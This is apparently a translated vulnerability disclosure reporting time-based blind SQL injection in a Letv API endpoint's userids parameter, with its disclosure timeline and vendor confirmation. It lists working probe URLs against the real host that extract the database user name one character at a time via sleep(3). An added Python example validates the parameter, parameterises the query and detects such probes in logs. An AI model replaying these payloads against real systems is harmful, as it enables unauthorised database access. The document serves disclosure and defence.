2015-12-05: Details reported to the vendor; awaiting the vendor's handling
2015-12-08: Vendor confirmed; details disclosed to the vendor only
2015-12-18: Details disclosed to core white hats and experts in related fields
2015-12-28: Details disclosed to regular white hats
2016-01-07: Details disclosed to intern white hats
2016-01-21: Details disclosed to the public
Injection in a Letv API endpoint
http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282
uservideo_r@1
http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(1)for(1)))=117) then sleep(3) else 0 end)
http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(2)for(1)))=115) then sleep(3) else 0 end)
http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(1)for(1)))=101) then sleep(3) else 0 end)
http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(4)for(1)))=114) then sleep(3) else 0 end)
http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(5)for(1)))=118) then sleep(3) else 0 end)
http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(6)for(1)))=105) then sleep(3) else 0 end)
http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(7)for(1)))=100) then sleep(3) else 0 end)
http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(8)for(1)))=101) then sleep(3) else 0 end)
http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(9)for(1)))=111) then sleep(3) else 0 end)
http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(10)for(1)))=95) then sleep(3) else 0 end)
http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(11)for(1)))=114) then sleep(3) else 0 end)
http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(12)for(1)))=64) then sleep(3) else 0 end)
http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(13)for(1)))=49) then sleep(3) else 0 end)
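The probes above work because the userids parameter, which should only ever be a comma-separated list of integer IDs, reaches the SQL layer unvalidated, and the only signal the attacker needs is whether the response is delayed by sleep(3). The following is an added example written for this page (it is not code from the report, from WooYun, or from Letv) showing the two things a defender would put in place: a strict allow-list parse of userids feeding a parameterised IN (...) query, and a log check that flags requests whose userids value carries the time-based probe markers together with a slow response. The access-log records are constructed; the table name users and the column names are hypothetical placeholders.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlsplit

MAX_IDS = 100
# Allow-list shape of a valid userids value: 1..MAX_IDS positive integers, comma separated, nothing else.
ID_LIST = re.compile(r"^[0-9]{1,18}(,[0-9]{1,18}){0,%d}$" % (MAX_IDS - 1))

# Markers of a time-based blind probe of the kind shown in the report (MySQL spellings, case-insensitive).
TIME_BASED = re.compile(
    r"\b(?:sleep|benchmark)\s*\(|\bcase\s+when\b|sysdate\s*\(\s*\)\s*=\s*now\s*\(\s*\)", re.I
)

# Constructed sample access-log records (method, path+query, response time in ms). Record 2 reuses the
# probe shape quoted in the report; record 3 is the same probe percent-encoded; records 1 and 4 are benign.
SAMPLE_LOG: List[Tuple[str, str, int]] = [
    ("GET", "/video/user/userlist?_=1&callback=cb&userids=17971889,68772723,115214501,129658282", 45),
    ("GET", "/video/user/userlist?_=1&callback=cb&userids=17971889,68772723 xor (case when (sysdate()=now() "
            "and ascii(mid(user()from(1)for(1)))=117) then sleep(3) else 0 end)", 3071),
    ("GET", "/video/user/userlist?_=1&callback=cb&userids=17971889%20xor%20(case%20when%20(sysdate()%3Dnow()"
            "%20and%20ascii(mid(user()from(2)for(1)))%3D115)%20then%20sleep(3)%20else%200%20end)", 3044),
    ("GET", "/video/user/userlist?_=1&callback=cb&userids=", 12),
]


def parse_userids(raw: str) -> List[int]:
    """Strict parse of the userids parameter. Anything that is not a plain integer list
    (spaces, operators, keywords, an empty value) is rejected before it can reach SQL."""
    if not ID_LIST.fullmatch(raw):
        raise ValueError("userids must be a comma-separated list of integers")
    ids = [int(x) for x in raw.split(",")]
    if any(i <= 0 for i in ids):
        raise ValueError("user ids must be positive")
    return ids


def build_query(ids: List[int]) -> Tuple[str, Tuple[int, ...]]:
    """Parameterised lookup: one placeholder per id, values handed to the driver separately,
    so no user-controlled text is ever concatenated into the statement. Table/columns are hypothetical."""
    placeholders = ",".join(["%s"] * len(ids))
    sql = "SELECT id, nickname FROM users WHERE id IN (%s)" % placeholders
    return sql, tuple(ids)


def inspect_request(path_query: str, latency_ms: int, slow_ms: int = 2500) -> Dict[str, object]:
    """Classify one request. A value that is present but not an integer list is suspicious on its own;
    probe markers plus a response slower than slow_ms are the time-based blind signature."""
    params = parse_qs(urlsplit(path_query).query, keep_blank_values=True)  # parse_qs percent-decodes
    raw = params.get("userids", [""])[0]
    reasons: List[str] = []
    if raw and not ID_LIST.fullmatch(raw):
        reasons.append("userids-not-int-list")
    if TIME_BASED.search(raw):
        reasons.append("time-based-sqli-marker")
        if latency_ms >= slow_ms:
            reasons.append("slow-response")
    return {"userids": raw, "suspicious": bool(reasons), "reasons": reasons}


def scan_log(records: List[Tuple[str, str, int]]) -> List[Dict[str, object]]:
    """Run inspect_request over log records and return only the flagged ones, with the original path."""
    flagged = []
    for method, path_query, latency_ms in records:
        verdict = inspect_request(path_query, latency_ms)
        if verdict["suspicious"]:
            verdict["path"] = path_query
            flagged.append(verdict)
    return flagged


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["reasons"], hit["path"][:80])
```

The validator and the detector share one definition of "what userids may look like" (ID_LIST), which is the point: the application rejects anything outside that shape before it touches SQL, and the log check alerts on the same shape violation, with the sleep/latency pairing as the high-confidence signal for a time-based blind attempt.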
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-12-08 09:43
Thank you for the submission; the relevant business unit has been notified to handle it.
None yet